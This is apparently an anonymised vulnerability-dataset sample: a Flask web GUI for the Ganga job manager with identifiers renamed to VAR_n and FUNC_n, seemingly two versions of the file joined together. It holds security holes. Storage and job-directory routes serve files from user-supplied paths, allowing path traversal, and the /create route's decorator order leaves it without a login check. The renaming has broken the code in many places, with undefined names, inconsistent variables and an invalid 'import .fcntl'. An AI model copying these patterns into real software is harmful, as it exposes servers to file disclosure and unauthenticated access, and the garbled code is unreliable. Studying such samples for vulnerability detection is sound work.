return redirect(url_for("job_page", VAR_9=job_id))
if os.path.isfile(VAR_58):
return send_file(VAR_58)
VAR_60 = []
VAR_61 = os.listdir(VAR_58)
for file in VAR_61:
VAR_60.append({
"file": file,
"directory": os.path.isdir(os.path.join(VAR_58, file))
})
return render_template('job_dir.html', title=f"Job {VAR_9} Directory",
VAR_9=job_id,
VAR_58=abs_path,
VAR_60=files_info,
VAR_59=back_path)
@VAR_0.route("/jobs/<int:VAR_9>/subjobs", methods=["GET", "POST"])
@login_required
def FUNC_15(VAR_9: int):
if request.method == "POST":
session["subjobs_per_page"] = int(request.form.get("subjobs-per-page"))
VAR_84["subjobs_filter"] = {key: request.form.get(form_name) for key, form_name in
zip(["status", "application", "backend"],
["subjob-status", "subjob-application", "subjob-backend"])}
VAR_51 = int(request.args.get("page")) if request.args.get("page") is not None else 0
VAR_62 = VAR_84["subjobs_per_page"]
try:
VAR_101 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/length", "get",
VAR_73=VAR_84["subjobs_filter"])
VAR_91 = (int(VAR_101) // int(VAR_62)) + 1
if VAR_51 >= VAR_91:
return redirect(url_for("subjobs_page", page=VAR_91 - 1, VAR_9=job_id))
params = VAR_84["subjobs_filter"].copy()
VAR_73.update({
"recent": True,
"length": VAR_62,
"offset": VAR_51
})
VAR_102 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs", "get", VAR_73=params)
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("job_page", VAR_9=job_id))
return render_template("subjobs.html",
title=f"Subjobs - Job {VAR_9}",
VAR_5=status_color,
VAR_91=number_of_pages,
VAR_51=current_page,
backends=VAR_8["backends"],
applications=VAR_8["applications"],
VAR_102=subjobs_info,
VAR_9=job_id)
@VAR_0.route("/jobs/<int:VAR_9>/subjobs/<int:VAR_11>", methods=["GET"])
@login_required
def FUNC_16(VAR_9: int, VAR_11: int):
VAR_54 = None
VAR_55 = None
try:
VAR_103 = FUNC_58(f"/internal/jobs/{VAR_9}/outputdir", "get")
VAR_104 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}", "get")
VAR_95 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}/full-print", "get")
VAR_105 = os.path.dirname(os.path.dirname(VAR_103["outputdir"]))
VAR_106 = os.path.dirname(os.path.dirname(VAR_104["outputdir"]))
VAR_107 = VAR_106.replace(VAR_105, "")
VAR_96 = os.path.join(VAR_104["outputdir"], "stdout")
VAR_97 = os.path.join(VAR_104["outputdir"], "stderr")
if os.path.exists(VAR_96):
with open(VAR_96) as VAR_14:
VAR_54 = VAR_14.read()
if os.path.exists(VAR_97):
with open(VAR_97) as VAR_14:
VAR_55 = VAR_14.read()
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("subjobs_page", VAR_9=job_id))
return render_template("subjob.html",
title=f"Subjob {VAR_11} - Job {VAR_9}",
VAR_104=subjob_info,
VAR_5=status_color,
attribute_actions=VAR_7["attributes"],
method_actions=VAR_7["methods"],
VAR_54=stdout,
VAR_55=stderr,
VAR_95=full_print_info,
VAR_9=job_id,
VAR_107=browse_path)
@VAR_0.route("/credentials")
@login_required
def FUNC_17():
try:
VAR_108 = FUNC_58("/internal/credentials", "get")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template('credentials.html', credential_info_list=VAR_108)
@VAR_0.route("/queue", methods=["GET"])
@login_required
def FUNC_18():
try:
VAR_109 = FUNC_58("/internal/queue", "get")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template('queue.html', queue_info_list=VAR_109)
@VAR_0.route('/plugins')
@login_required
def FUNC_19():
try:
VAR_110 = VAR_8
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template('plugins.html', VAR_110=plugins_info)
@VAR_0.route("/plugin/<VAR_12>")
@login_required
def FUNC_20(VAR_12: str):
try:
VAR_111 = FUNC_58(f"/internal/VAR_8/{VAR_12}", "get")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("plugins_page"))
return render_template("plugin.html", title=f"{VAR_12}", VAR_111=plugin_info)
@VAR_0.route("/logs")
@login_required
def FUNC_21():
VAR_63 = VAR_0.config["GANGA_LOG"]
VAR_64 = VAR_0.config["ACCESS_LOG"]
VAR_65 = VAR_0.config["ERROR_LOG"]
try:
with open(VAR_63, "rt") as VAR_14:
VAR_122 = VAR_14.read()
with open(VAR_64, "rt") as VAR_14:
VAR_123 = VAR_14.read()
with open(VAR_65, "rt") as VAR_14:
VAR_124 = VAR_14.read()
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template("logs.html", title="Logs", VAR_122=ganga_log_data,
VAR_123=gui_accesslog_data, VAR_124=gui_errorlog_data)
@VAR_0.route("/storage", defaults={"path": ""}, methods=["GET", "POST"])
@VAR_0.route("/storage/<VAR_10:path>", methods=["GET", "POST"])
@login_required
def FUNC_22(VAR_10):
VAR_66 = VAR_0.config["STORAGE_FOLDER"]
VAR_58 = os.path.join(VAR_66, VAR_10)
if request.method == "POST":
if "storagefile" in request.files:
VAR_125 = request.files["storagefile"]
if VAR_125.filename == "":
flash("No file selected", "warning")
return redirect(request.url)
if VAR_125:
if not os.path.isdir(VAR_58):
flash("Error while uploading the file", "danger")
return redirect(request.url)
VAR_20 = secure_filename(VAR_125.filename)
VAR_130 = os.path.join(VAR_58, VAR_20)
VAR_125.save(VAR_130)
flash("Successfully uploaded the file.", "success")
return redirect(request.url)
flash("No file, retry!", "warning")
return redirect(request.url)
VAR_59 = os.path.dirname(VAR_58).replace(VAR_66, "")
if not os.path.exists(VAR_58):
flash("Directory does not exist.", "warning")
return redirect(url_for("dashboard"))
if os.path.isfile(VAR_58):
return send_file(VAR_58)
VAR_60 = []
VAR_61 = os.listdir(VAR_58)
for file in VAR_61:
VAR_60.append({
"file": file,
"directory": os.path.isdir(os.path.join(VAR_58, file))
})
return render_template("storage.html", title="Storage",
VAR_58=abs_path,
VAR_60=files_info,
VAR_59=back_path)
@VAR_0.route("/cli")
@login_required
def FUNC_23():
return render_template("cli.html")
@VAR_3.on("connect", namespace="/pty")
def FUNC_24():
if VAR_0.config["CHILD_PID"] and current_user.is_authenticated:
VAR_3.start_background_task(target=FUNC_63)
return
@VAR_3.on("pty-input", namespace="/pty")
def FUNC_25(VAR_13):
if VAR_0.config["FD"] and current_user.is_authenticated:
os.write(VAR_0.config["FD"], VAR_13["input"].encode())
@VAR_3.on("resize", namespace="/pty")
def FUNC_26(VAR_13):
if VAR_0.config["FD"] and current_user.is_authenticated:
FUNC_62(VAR_0.config["FD"], VAR_13["rows"], VAR_13["cols"])
@VAR_0.route("/token", methods=["POST"])
def FUNC_27():
VAR_67 = request.json if request.json else {}
VAR_68 = VAR_67.get("username")
VAR_69 = VAR_67.get("password")
if not VAR_68 or not VAR_69:
VAR_70 = {"success": False, "message": "Could not verify VAR_37."}
return jsonify(VAR_70), 401
VAR_37 = CLASS_0.query.filter_by(VAR_37=VAR_68).first()
if VAR_37 and VAR_37.verify_password(VAR_69):
VAR_112 = VAR_37.generate_auth_token().decode("UTF-8")
VAR_70 = {"token": VAR_112}
return jsonify(VAR_70)
VAR_70 = {"success": False, "message": "Could not verify VAR_37."}
return jsonify(VAR_70), 401
def FUNC_28(VAR_14):
@wraps(VAR_14)
def FUNC_69(*VAR_25, **VAR_23):
VAR_112 = None
if "X-Access-Token" in request.headers:
VAR_112 = request.headers["X-Access-Token"]
if not VAR_112:
return jsonify({"success": False, "message": "Token is missing"}), 401
try:
VAR_13 = jwt.decode(VAR_112, VAR_0.config["SECRET_KEY"], algorithms=["HS256"])
VAR_15 = CLASS_0.query.filter_by(VAR_36=VAR_13["public_id"]).first()
if VAR_15 is None:
return jsonify({"success": False, "message": "Token is old. Please renew"}), 401
except jwt.ExpiredSignatureError:
return jsonify({"success": False, "message": "Token is expired"}), 401
except jwt.InvalidTokenError:
return jsonify({"success": False, "message": "Token is invalid"}), 401
except:
return jsonify({"success": False, "message": "Could not verify token"}), 401
return VAR_14(VAR_15, *VAR_25, **VAR_23)
return FUNC_69
@VAR_0.route("/api/jobs/<int:VAR_9>", methods=["GET"])
@FUNC_28
def FUNC_29(VAR_15, VAR_9: int):
try:
VAR_94 = FUNC_58(f"/internal/jobs/{VAR_9}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_94)
@VAR_0.route("/api/jobs/<int:VAR_9>/<VAR_16>", methods=["GET"])
@FUNC_28
def FUNC_30(VAR_15, VAR_9: int, VAR_16: str):
try:
VAR_113 = FUNC_58(f"/internal/jobs/{VAR_9}/{VAR_16}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_113)
@VAR_0.route("/api/jobs/<int:VAR_9>/full-print", methods=["GET"])
@FUNC_28
def FUNC_31(VAR_15, VAR_9: int):
try:
VAR_95 = FUNC_58(f"/internal/jobs/{VAR_9}/full-print", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_95)
@VAR_0.route("/api/jobs/create", methods=["POST"])
@FUNC_28
def FUNC_32(VAR_15):
VAR_13 = {
"template_id": request.json.get("template_id"),
"job_name": request.json.get("job_name")
}
try:
VAR_98 = FUNC_58("/internal/jobs/create", "post", json=VAR_13)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/jobs/<int:VAR_9>/copy", methods=["PUT"])
@FUNC_28
def FUNC_33(VAR_15, VAR_9: int):
try:
VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}/copy", "put")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/jobs/<int:VAR_9>/<VAR_17>", methods=["PUT"])
@FUNC_28
def FUNC_34(VAR_15, VAR_9: int, VAR_17: str):
VAR_71 = request.json
try:
VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}/{VAR_17}", "put", json=VAR_71)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/jobs/<int:VAR_9>", methods=["DELETE"])
@FUNC_28
def FUNC_35(VAR_15, VAR_9: int):
try:
VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}", "delete")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/jobs/<int:VAR_9>/pin", methods=["PUT"])
@FUNC_28
def FUNC_36(VAR_15, VAR_9: int):
VAR_72 = current_user
VAR_40 = json.loads(VAR_72.pinned_jobs) if VAR_72.pinned_jobs is not None else []
if VAR_9 not in VAR_40:
pinned_jobs.append(VAR_9)
VAR_72.pinned_jobs = json.dumps(VAR_40)
VAR_1.session.add(VAR_72)
VAR_1.session.commit()
return jsonify({"success": True, "message": f"Successfully pinned Job (ID={VAR_9})."})
@VAR_0.route("/api/jobs/<int:VAR_9>/unpin", methods=["PUT"])
@FUNC_28
def FUNC_37(VAR_15, VAR_9: int):
VAR_72 = current_user
VAR_40 = json.loads(VAR_72.pinned_jobs) if VAR_72.pinned_jobs is not None else []
if VAR_9 in VAR_40:
pinned_jobs.remove(VAR_9)
VAR_72.pinned_jobs = json.dumps(VAR_40)
VAR_1.session.add(VAR_72)
VAR_1.session.commit()
return jsonify({"success": True, "message": f"Successfully unpinned Job (ID={VAR_9})."})
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs", methods=["GET"])
@FUNC_28
def FUNC_38(VAR_15, VAR_9: int):
VAR_73 = {
"ids": request.args.get("ids"),
"status": request.args.get("status"),
"application": request.args.get("application"),
"backend": request.args.get("backend"),
"recent": request.args.get("recent"),
"length": request.args.get("length"),
"offset": request.args.get("offset")
}
try:
VAR_102 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs", "get", VAR_73=params)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_102)
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs/<int:VAR_11>", methods=["GET"])
@FUNC_28
def FUNC_39(VAR_15, VAR_9: int, VAR_11: int):
try:
VAR_104 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_104)
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs/<int:VAR_11>/<VAR_16>", methods=["GET"])
@FUNC_28
def FUNC_40(VAR_15, VAR_9: int, VAR_11: int, VAR_16: str):
try:
VAR_114 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}/{VAR_16}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_114)
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs/<int:VAR_11>/full-print", methods=["GET"])
@FUNC_28
def FUNC_41(VAR_15, VAR_9: int, VAR_11: int):
try:
VAR_95 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}/full-print", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_95)
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs/<int:VAR_11>/copy", methods=["PUT"])
@FUNC_28
def FUNC_42(VAR_15, VAR_9: int, VAR_11: int):
try:
VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}/copy", "put")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/jobs", methods=["GET"])
@FUNC_28
def FUNC_43(VAR_15):
VAR_73 = {
"ids": request.args.get("ids"),
"status": request.args.get("status"),
"application": request.args.get("application"),
"backend": request.args.get("backend"),
"recent": request.args.get("recent"),
"length": request.args.get("length"),
"offset": request.args.get("offset"),
"auto-validate-ids": request.args.get("auto-validate-ids")
}
try:
VAR_93 = FUNC_58(f"/internal/jobs", "get", VAR_73=params)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_93)
@VAR_0.route("/api/jobs/statistics", methods=["GET"])
@FUNC_28
def FUNC_44(VAR_15):
try:
VAR_115 = FUNC_58("/internal/jobs/statistics", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_115)
@VAR_0.route("/api/queue", methods=["GET"])
@FUNC_28
def FUNC_45(VAR_15):
try:
VAR_109 = FUNC_58("/internal/queue", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_109)
@VAR_0.route("/api/queue/chart", methods=["GET","POST"])
def FUNC_46():
VAR_74 = FUNC_58("/internal/queue/data", "get")
VAR_75 = make_response(json.dumps(VAR_74))
VAR_75.content_type = 'application/json'
return VAR_75
@VAR_0.route("/api/jobs/incomplete_ids", methods=["GET"])
@FUNC_28
def FUNC_47(VAR_15):
try:
VAR_116 = FUNC_58("/internal/jobs/incomplete-ids", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_116)
@VAR_0.route("/api/config", methods=["GET"], defaults={"section": ""})
@VAR_0.route("/api/config/<VAR_18>", methods=["GET"])
@FUNC_28
def FUNC_48(VAR_15, VAR_18: str):
try:
if VAR_18 != "":
VAR_48 = FUNC_58(f"/internal/config/{VAR_18}", "get")
else:
VAR_48 = FUNC_58("/internal/config", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_48)
@VAR_0.route("/api/templates", methods=["GET"])
@FUNC_28
def FUNC_49(VAR_15):
VAR_73 = {
"application": request.args.get("application"),
"backend": request.args.get("backend"),
"recent": request.args.get("recent"),
"length": request.args.get("length"),
"offset": request.args.get("offset"),
}
try:
VAR_88 = FUNC_58("/internal/templates", "get", VAR_73=params)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_88)
@VAR_0.route("/api/templates/<int:VAR_19>/full-print", methods=["GET"])
@FUNC_28
def FUNC_50(VAR_15, VAR_19: int):
try:
VAR_95 = FUNC_58(f"/internal/templates/{VAR_19}/full-print", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_95)
@VAR_0.route("/api/templates/<int:VAR_19>", methods=["DELETE"])
@FUNC_28
def FUNC_51(VAR_15, VAR_19: int):
try:
VAR_98 = FUNC_58(f"/internal/templates/{VAR_19}", "delete")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/credentials", methods=["GET"])
@FUNC_28
def FUNC_52(VAR_15):
try:
VAR_108 = FUNC_58("/internal/credentials", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_108)
@VAR_0.route("/api/credentials/renew", methods=["PUT"])
@FUNC_28
def FUNC_53(VAR_15):
try:
VAR_98 = FUNC_58("/internal/credentials/renew", "put")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/jobtree", methods=["GET"])
@FUNC_28
def FUNC_54(VAR_15):
try:
VAR_117 = FUNC_58("/internal/jobtree", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_117)
@VAR_0.route("/api/plugins", methods=["GET"])
@FUNC_28
def FUNC_55(VAR_15):
try:
VAR_110 = FUNC_58("/internal/plugins", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_110)
@VAR_0.route("/api/VAR_8/<VAR_12>", methods=["GET"])
@FUNC_28
def FUNC_56(VAR_15, VAR_12: str):
try:
VAR_111 = FUNC_58(f"/internal/VAR_8/{VAR_12}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_111)
def FUNC_57(VAR_20):
return "." in VAR_20 and VAR_20.rsplit(".", 1)[1].lower() in VAR_6
def FUNC_58(VAR_21: str, VAR_22: str, **VAR_23):
VAR_76 = f"http://localhost:{VAR_0.config['INTERNAL_PORT']}"
if VAR_22 not in ["get", "post", "put", "delete"]:
raise Exception(f"Unsupported VAR_22: {method}")
VAR_77 = getattr(requests, VAR_22)(VAR_76 + VAR_21, **VAR_23)
if VAR_77.status_code != 200:
raise Exception(VAR_77.json().get("message"))
return VAR_77.json()
def FUNC_59():
if "templates_per_page" not in VAR_84:
session["templates_per_page"] = 10
if "templates_filter" not in VAR_84:
session["templates_filter"] = {key: "any" for key in ["application", "backend"]}
if "jobs_per_page" not in VAR_84:
session["jobs_per_page"] = 10
if "jobs_filter" not in VAR_84:
session["jobs_filter"] = {key: "any" for key in ["status", "application", "backend"]}
if "subjobs_per_page" not in VAR_84:
session["subjobs_per_page"] = 10
if "subjobs_filter" not in VAR_84:
session["subjobs_filter"] = {key: "any" for key in ["status", "application", "backend"]}
def FUNC_60():
VAR_78 = 0
while True:
try:
VAR_126 = FUNC_58("/ping", "get")
if VAR_126 is True:
return True
except:
time.sleep(2)
print("Internal API server not online (mostly because Ganga is booting up), retrying...")
VAR_78 += 1
if VAR_78 > 20:
return False
def FUNC_61(VAR_24: int, VAR_25: str = ""):
(VAR_79, VAR_26) = pty.fork()
if VAR_79 == 0:
VAR_118 = os.environ.copy()
VAR_118["WEB_CLI"] = "True"
VAR_118["INTERNAL_PORT"] = str(VAR_24)
subprocess.run(f"ganga --webgui {VAR_25}", shell=True, env=VAR_118)
else:
VAR_0.config["FD"] = VAR_26
VAR_0.config["CHILD_PID"] = VAR_79
FUNC_62(VAR_26, 50, 50)
print("Ganga started, PID: ", VAR_79)
def FUNC_62(VAR_26, VAR_27, VAR_28, VAR_29=0, VAR_30=0):
VAR_80 = struct.pack("HHHH", VAR_27, VAR_28, VAR_29, VAR_30)
fcntl.ioctl(VAR_26, termios.TIOCSWINSZ, VAR_80)
def FUNC_63():
VAR_81 = 1024 * 20
while True:
VAR_3.sleep(0.01)
if VAR_0.config["FD"]:
VAR_127 = 0
(VAR_128, VAR_129, _) = select.select([VAR_0.config["FD"]], [], [], VAR_127)
if VAR_128:
VAR_131 = os.read(VAR_0.config["FD"], VAR_81).decode()
VAR_3.emit("pty-output", {"output": VAR_131}, namespace="/pty")
def FUNC_64(VAR_31: str, VAR_32: int, VAR_24: int, VAR_33=True, VAR_34: str = ""):
from GangaGUI.start import create_default_user
VAR_82, VAR_83 = create_default_user()
print(f"Starting the GUI server on http://{VAR_31}:{VAR_32}")
print(f"You VAR_2 information for the GUI is: Username: {VAR_82.user} Password: {VAR_83}")
VAR_0.config["INTERNAL_PORT"] = VAR_24
VAR_0.config["WEB_CLI"] = True
VAR_0.config["GANGA_ARGS"] = VAR_34
VAR_3.run(VAR_0, VAR_31=host, VAR_32=port, VAR_33=log_output) # TODO
@VAR_0.route("/shutdown", methods=["GET"])
def FUNC_65():
if VAR_0.config["WEB_CLI"] is True:
flash("WEB CLI Mode is on, cannot self FUNC_65 server. Consider doing manually.", "warning")
return redirect(url_for("dashboard"))
try:
VAR_98 = FUNC_58("/shutdown", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return "GUI Shutdown Successful."
| import os
import jwt
import json
import requests
import time
import select
import termios
import struct
import .fcntl
import subprocess
import pty
import sys
import datetime
from functools import wraps
from werkzeug.utils import secure_filename, safe_join
from werkzeug.security import generate_password_hash, check_password_hash
from flask import Flask, request, jsonify, render_template, flash, redirect, url_for, VAR_84, send_file, make_response
from flask_login import .login_user, login_required, logout_user, current_user, UserMixin
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_socketio import SocketIO
from GangaGUI.gui.config import Config
VAR_0 = Flask(__name__)
VAR_0.config.from_object(Config)
VAR_1 = SQLAlchemy(VAR_0)
VAR_2 = LoginManager(VAR_0)
VAR_2.login_view = "login"
VAR_2.login_message = "Please Login to Access this Page."
VAR_2.login_message_category = "warning"
VAR_3 = SocketIO(VAR_0)
class CLASS_0(UserMixin, VAR_1.Model):
__tablename__ = "users"
VAR_35 = VAR_1.Column(VAR_1.Integer, primary_key=True)
VAR_36 = VAR_1.Column(VAR_1.String(64), unique=True)
VAR_37 = VAR_1.Column(VAR_1.String(32), unique=True)
VAR_38 = VAR_1.Column(VAR_1.String(64))
VAR_39 = VAR_1.Column(VAR_1.String(32))
VAR_40 = VAR_1.Column(VAR_1.Text)
def FUNC_66(self, VAR_41: str):
self.password_hash = generate_password_hash(VAR_41)
def FUNC_67(self, VAR_41: str) -> bool:
return check_password_hash(self.password_hash, VAR_41)
def FUNC_68(self, VAR_42: int = 5) -> str:
return jwt.encode(
{"public_id": self.public_id, "exp": datetime.datetime.utcnow() + datetime.timedelta(days=VAR_42)},
VAR_0.config["SECRET_KEY"], algorithm="HS256")
def __repr__(self):
return "User {}: {} (Public ID: {}, Role: {})".format(self.id, self.user, self.public_id, self.role)
@VAR_2.user_loader
def FUNC_0(VAR_4):
return CLASS_0.query.get(int(VAR_4))
VAR_5 = {
"new": "info",
"completed": "success",
"completed_frozen" : "success",
"failed": "danger",
"failed_frozen" : "danger",
"running": "primary",
"submitted": "secondary",
"killed": "warning"
}
VAR_6 = {"txt", "py"}
actions = {}
VAR_8 = {}
@VAR_0.before_first_request
def FUNC_1():
global VAR_7, VAR_8
if VAR_0.config['WEB_CLI'] is True:
FUNC_61(VAR_0.config['INTERNAL_PORT'], VAR_25=VAR_0.config["GANGA_ARGS"])
VAR_84["WEB_CLI"] = True
elif VAR_0.config['INTERNAL_PORT'] is None:
VAR_0.config['INTERNAL_PORT'] = os.environ['INTERNAL_PORT']
if current_user.is_authenticated:
logout_user()
FUNC_59()
if not FUNC_60():
print("INTERNAL SERVER UNAVAILABLE, TERMINATING...")
sys.exit(1)
try:
VAR_7 = FUNC_58("/internal/jobs/actions", "get")
VAR_8 = FUNC_58("/internal/plugins", "get")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
@VAR_0.route("/login", methods=["GET", "POST"])
def VAR_2():
if current_user.is_authenticated:
return redirect(url_for("dashboard"))
if request.method == "POST":
VAR_85 = request.form.get("username")
VAR_41 = request.form.get("password")
VAR_37 = CLASS_0.query.filter_by(VAR_37=VAR_85).first()
if VAR_37 and VAR_37.verify_password(VAR_41):
login_user(VAR_37, True)
flash("Login successful", "success")
return redirect(url_for("dashboard"))
flash("Error identifying the user", "danger")
VAR_43 = CLASS_0.query.all()
return render_template("login.html", title="Login", VAR_43=users)
@VAR_0.route("/logout", methods=["GET"])
def FUNC_3():
if current_user.is_authenticated:
logout_user()
return redirect(url_for("login"))
@VAR_0.route("/")
@login_required
def FUNC_4():
VAR_44 = {}
VAR_45 = []
VAR_46 = []
try:
VAR_44 = FUNC_58("/internal/jobs/statistics", "get")
VAR_45 = FUNC_58("/internal/jobs/recent", "get")
VAR_72 = current_user
VAR_46 = FUNC_58("/internal/jobs", "get", VAR_73={
"ids": VAR_72.pinned_jobs if VAR_72.pinned_jobs is not None else json.dumps([]),
"auto-validate-ids": True})
except Exception as err:
flash(str(err), "danger")
return render_template("dashboard.html",
title="Dashboard",
VAR_44=quick_statistics,
VAR_45=recent_jobs_info,
VAR_46=pinned_jobs_info,
VAR_5=status_color)
@VAR_0.route("/config", methods=["GET", "POST"])
@login_required
def FUNC_5():
VAR_47 = []
VAR_48 = []
VAR_18 = None
if request.method == "POST":
VAR_18 = request.form.get("section")
VAR_18 = None if VAR_18 in ["", None] else VAR_18
try:
VAR_47 = FUNC_58("/internal/config", "get")
VAR_48 = VAR_47 if VAR_18 is None else [s for s in VAR_47 if s["name"] == VAR_18]
except Exception as err:
flash(str(err), "danger")
return render_template("config.html", title="Config", VAR_47=full_config_info, VAR_48=config_info)
@VAR_0.route("/config_edit",methods=["GET", "POST"])
@login_required
def FUNC_6():
VAR_49 = VAR_0.config["GANGA_RC"]
with open(VAR_49, "rt") as VAR_14:
VAR_86 = VAR_14.read()
if request.method == 'POST':
VAR_87 = request.form['config-data']
with open(VAR_49, 'w') as f1:
f1.write(str(VAR_87))
flash(".gangarc Edited", "success")
with open(VAR_49, "rt") as f2:
VAR_86 = f2.read()
return render_template("config_edit.html", title="Edit gangarc", VAR_86=ganga_config)
@login_required
@VAR_0.route("/create", methods=["GET", "POST"])
def FUNC_7():
if request.method == "POST":
if "loadfile" in request.files:
VAR_119 = request.files["loadfile"]
if VAR_119.filename == "":
flash("No file selected", "warning")
return redirect(request.url)
if VAR_119 and FUNC_57(VAR_119.filename):
VAR_130 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "loadfile.txt")
VAR_119.save(VAR_130)
try:
VAR_98 = FUNC_58("/internal/load", "get", VAR_73={"path": VAR_130})
except Exception as err:
flash(str(err), "danger")
return redirect(request.url)
flash(VAR_98.get("message"), "success")
return redirect(request.url)
if "runfile" in request.files:
VAR_120 = request.files["runfile"]
if VAR_120.filename == "":
flash("No file selected", "warning")
return redirect(request.url)
if VAR_120 and FUNC_57(VAR_120.filename):
VAR_130 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "runfile.py")
VAR_120.save(VAR_130)
try:
VAR_98 = FUNC_58("/internal/runfile", "get", VAR_73={"path": VAR_130})
except Exception as err:
flash(str(err), "danger")
return redirect(request.url)
flash(VAR_98.get("message"), "success")
return redirect(request.url)
flash("No file, retry!", "warning")
return redirect(request.url)
try:
VAR_88 = FUNC_58("/internal/templates", "get",
VAR_73={"recent": True, "length": "6"})
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template("create.html", title="Create", VAR_88=templates_info)
@VAR_0.route("/create/runfile", methods=["GET", "POST"])
@login_required
def FUNC_8():
VAR_50 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "runfile.py")
if request.method == "POST":
VAR_89 = request.form.get("runfile-data")
with open(VAR_50, "w+") as VAR_14:
f.write(VAR_89)
try:
VAR_98 = FUNC_58("/internal/runfile", "get", VAR_73={"path": VAR_50})
flash(VAR_98["message"], "success")
except Exception as err:
flash(str(err), "danger")
return redirect(request.url)
return render_template("runfile.html", title="Runfile")
@VAR_0.route("/templates", methods=["GET", "POST"])
@login_required
def FUNC_9():
if request.method == "POST":
session["templates_per_page"] = int(request.form.get("templates-per-page"))
VAR_84["templates_filter"] = {key: request.form.get(form_name) for key, form_name in
zip(["application", "backend"], ["template-application", "template-backend"])}
VAR_51 = int(request.args.get("page")) if request.args.get("page") is not None else 0
VAR_52 = VAR_84["templates_per_page"]
try:
VAR_90 = FUNC_58("/internal/templates/length", "get", VAR_73=VAR_84["templates_filter"])
VAR_91 = (int(VAR_90) // int(VAR_52)) + 1
if VAR_51 >= VAR_91:
return redirect(url_for("templates_page", page=VAR_91 - 1))
params = VAR_84["templates_filter"].copy()
VAR_73.update({
"recent": True,
"length": VAR_52,
"offset": VAR_51
})
VAR_88 = FUNC_58("/internal/templates", "get", VAR_73=params)
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("create_page"))
return render_template("templates.html",
title="Templates",
VAR_91=number_of_pages,
VAR_51=current_page,
backends=VAR_8["backends"],
applications=VAR_8["applications"],
VAR_88=templates_info)
@VAR_0.route("/jobs", methods=["GET", "POST"])
@login_required
def FUNC_10():
if request.method == "POST":
session["jobs_per_page"] = int(request.form.get("jobs-per-page"))
VAR_84["jobs_filter"] = {key: request.form.get(form_name) for key, form_name in
zip(["status", "application", "backend"],
["job-status", "job-application", "job-backend"])}
VAR_51 = int(request.args.get("page")) if request.args.get("page") is not None else 0
VAR_53 = VAR_84["jobs_per_page"]
try:
VAR_92 = FUNC_58("/internal/jobs/length", "get", VAR_73=VAR_84["jobs_filter"])
VAR_91 = (int(VAR_92) // int(VAR_53)) + 1
if VAR_51 >= VAR_91:
return redirect(url_for("jobs_page", page=VAR_91 - 1))
params = VAR_84["jobs_filter"].copy()
